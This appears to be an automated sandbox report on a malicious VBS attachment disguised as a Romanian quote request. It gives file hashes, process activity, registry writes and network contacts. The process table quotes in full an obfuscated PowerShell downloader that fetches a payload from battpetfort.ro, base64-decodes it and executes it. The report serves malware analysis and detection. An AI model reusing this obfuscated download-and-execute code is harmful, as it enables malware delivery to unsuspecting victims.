| File name: | CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.gz |
| Full analysis: | https://app.any.run/tasks/04c5b9d2-8e2d-41a7-b4d6-4d659ebcea2f |
| Verdict: | Malicious activity |
| Analysis date: | May 16, 2023, 12:13:17 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/gzip |
| File info: | gzip compressed data, was "CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs", last modified: Wed Apr 26 05:22:52 2023, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 28077 |
| MD5: | 2D2F1316B506F202330F985A1B60F41A |
| SHA1: | AF3FAB5850FA112129A08EF06A0394AEAD5CEF74 |
| SHA256: | 0469E06E3642E8CBE085F89023941C257DF7B179E93CE3C3FF8FF356FF2E4DF4 |
| SSDEEP: | 384:PSsCg0CRIAKU5HEQfVwRMtY0jeyqHvHMdzWkDxr43PcZE0:PSsCNCRL7fCRaTqHEN9d80 |
| .z/gz/gzip | | | GZipped data (100) |
|---|
| ArchivedFileName: | CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs |
|---|---|
| OperatingSystem: | FAT filesystem (MS-DOS, OS/2, NT/Win32) |
| ExtraFlags: | (none) |
| ModifyDate: | 2023:04:26 05:22:52+00:00 |
| Flags: | FileName |
| Compression: | Deflated |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 188 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3948.19583\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs" | C:\Windows\System32\wscript.exe | WinRAR.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 3588 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Uforgng1259 ([String]$presta){For($Tunerch=1; $Tunerch -lt $presta.Length-1; $Tunerch+=(1+1)){$Parall=$Parall+$presta.Substring($Tunerch, 1)};$Parall;}$Subrepta=Uforgng1259 'Vh tGtHp sC:F/ /Ab a tKtOppe tsf o rBtF.SrDo /CI c h tdh . aCfIm ';$Parall01=Uforgng1259 'GiSe xS ';$Ejertidend = Uforgng1259 ' \RsEy sCwWo w 6 4K\SW i nAdBoCw sBPTo w e raSFhFe lPlA\ v 1 . 0 \DpAoAwMeRr sIh e l lS.HePxAeL ';.($Parall01) (Uforgng1259 's$ SscFu r vC2 =S$ ednMvT:UwSi n d iJr ') ;.($Parall01) (Uforgng1259 ' $JEAj eFr tBiDdEe nMdC=K$SSLc uSrSv 2E+R$lEwjMe r tUiRd eMnkde ') ;.($Parall01) (Uforgng1259 'p$ S t epm p eIlTpFuKdB =M S( ( gNw mSiG wKiNnC3S2D_ApSr oUc e sMsA c- FF PArAoBcOe sTsHIBdP= $i{ PEI D }S) .FCSo mAmFa n duLPiPn e )F S-Ms pEl i tB P[GcEhAa r ]F3 4L ');.($Parall01) (Uforgng1259 ' $DMDuFnEd ecr i n gSeB2K2 P=D I$US t eUmMpBeEl pGuCdF[B$ SCtSeFmUp eMlDpSuMd . c ouuOnBtT-v2U] ');.($Parall01) (Uforgng1259 't$ T i l l b s sR2N0f4 = ( TPeLsNtP-CP aBtChR f$ EAjTeKrEtTi dueTnAd ) Q-OA nRdA M(A[UI nftoPOtirG]N:B: s iSzAeM - e qT F8m)U ') ;if ($Tillbss204) {.$Ejertidend $Munderinge22;} else {;$Parall00=Uforgng1259 'CS tfaor tc- BDiUt s TOrRaCnPs fSeVrS - SCoMuSrVcPe O$ISBuHbEr eApPtFaT B-SDGe sCt iMn aEt iRo n $SS cBu rCvP2R ';.($Parall01) (Uforgng1259 ' $ S c u rDv 2S= $VeKnIvc:Pa pCpTdFaJt a ') ;.($Parall01) (Uforgng1259 'DI mDpMoVr t -TMToHdLuRl e BTigtrs TprSa nCs f e rS ') ;$Scurv2=$Scurv2+'\Halfplan.Sul';while (-not $Agersv) {.($Parall01) (Uforgng1259 'L$NA g e r s vS= (PTBe s tU-HP a tSh $NS c uVrBv 2 ) ') ;.($Parall01) $Parall00;.($Parall01) (Uforgng1259 'AS t aRrBt - SIlSeAePpT D5 ');}.($Parall01) (Uforgng1259 'M$ U fBo rKg n gG1 2U5 = G e t -fC o n tSeBnWtG f$TSEc uSrSv 2r ');.($Parall01) (Uforgng1259 ' $TV o dBk aR C=Q [DS y sPt eIm .TCEoFn v eAr tB]a:U:FF rMo m B a s eI6 4US tCrSiEn gB( $ Udf o rPg nCgT1 2 5D) ');.($Parall01) (Uforgng1259 ' $nP a r aSlPl 2S U= [GSByPs tsePm .NTRe xVtH. EEn c obd innBgS] :S: ASS C I I . G eMtGSFtUrmiUn gS( $ V oFdAkAaH) ');.($Parall01) (Uforgng1259 ' $ FarCu gFt =U$FPPaAr a l l 2 . sKuHbasPt r i nFgA(F1 8 7H3P7A9 ,U1g8 7F3u1A)S ');.($Parall01) $Frugt;}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3948 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.gz.z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3948) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 188 | wscript.exe | C:\Users\admin\AppData\Local\Temp\TarE4A6.tmp | binary | |
MD5:4FF65AD929CD9A367680E0E5B1C08166 | SHA256:C8733C93CC5AAF5CA206D06AF22EE8DBDEC764FB5085019A6A9181FEB9DFDEE6 | |||
| 3948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3948.19583\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs | text | |
MD5:B5DE2D8F6BDF4A70832D83F3E3805677 | SHA256:7B50F628446EBA2B2D1B8CC3399877FB75E1DD86439ED2EDA18847BF160B47DC | |||
| 188 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:1F6846D294C799DB9A04153C9CB8F8E8 | SHA256:DCCD9F4E0AF5A0C9C8C080B35F998E138CE530DB9725EF45DCD75BE28B29978A | |||
| 3588 | powershell.exe | C:\Users\admin\AppData\Local\Temp\51rfetc5.erm.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 3588 | powershell.exe | C:\Users\admin\AppData\Local\Temp\os34euhf.dtu.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 188 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:3AC860860707BAAF32469FA7CC7C0192 | SHA256:D015145D551ECD14916270EFAD773BBC9FD57FAD2228D2C24559F696C961D904 | |||
| 188 | wscript.exe | C:\Users\admin\AppData\Local\Temp\CabE4A5.tmp | compressed | |
MD5:3AC860860707BAAF32469FA7CC7C0192 | SHA256:D015145D551ECD14916270EFAD773BBC9FD57FAD2228D2C24559F696C961D904 | |||
| 3948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3948.43452\CERERE URGENTA DE OFERTA KYOCERA AVX Components (Timisoara) SRL Romania.vbs | text | |
MD5:B5DE2D8F6BDF4A70832D83F3E3805677 | SHA256:7B50F628446EBA2B2D1B8CC3399877FB75E1DD86439ED2EDA18847BF160B47DC | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
188 | wscript.exe | GET | 200 | 8.238.29.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5aeb27b25f2561d9 | US | compressed | 62.3 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1076 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
188 | wscript.exe | 8.238.29.126:80 | ctldl.windowsupdate.com | LEVEL3 | US | suspicious |
3408 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
852 | svchost.exe | 93.119.122.128:443 | battpetfort.ro | CLAUS WEB srl | RO | suspicious |
— | — | 93.119.122.128:443 | battpetfort.ro | CLAUS WEB srl | RO | suspicious |
Domain | IP | Reputation |
|---|---|---|
ctldl.windowsupdate.com |
| whitelisted |
battpetfort.ro |
| suspicious |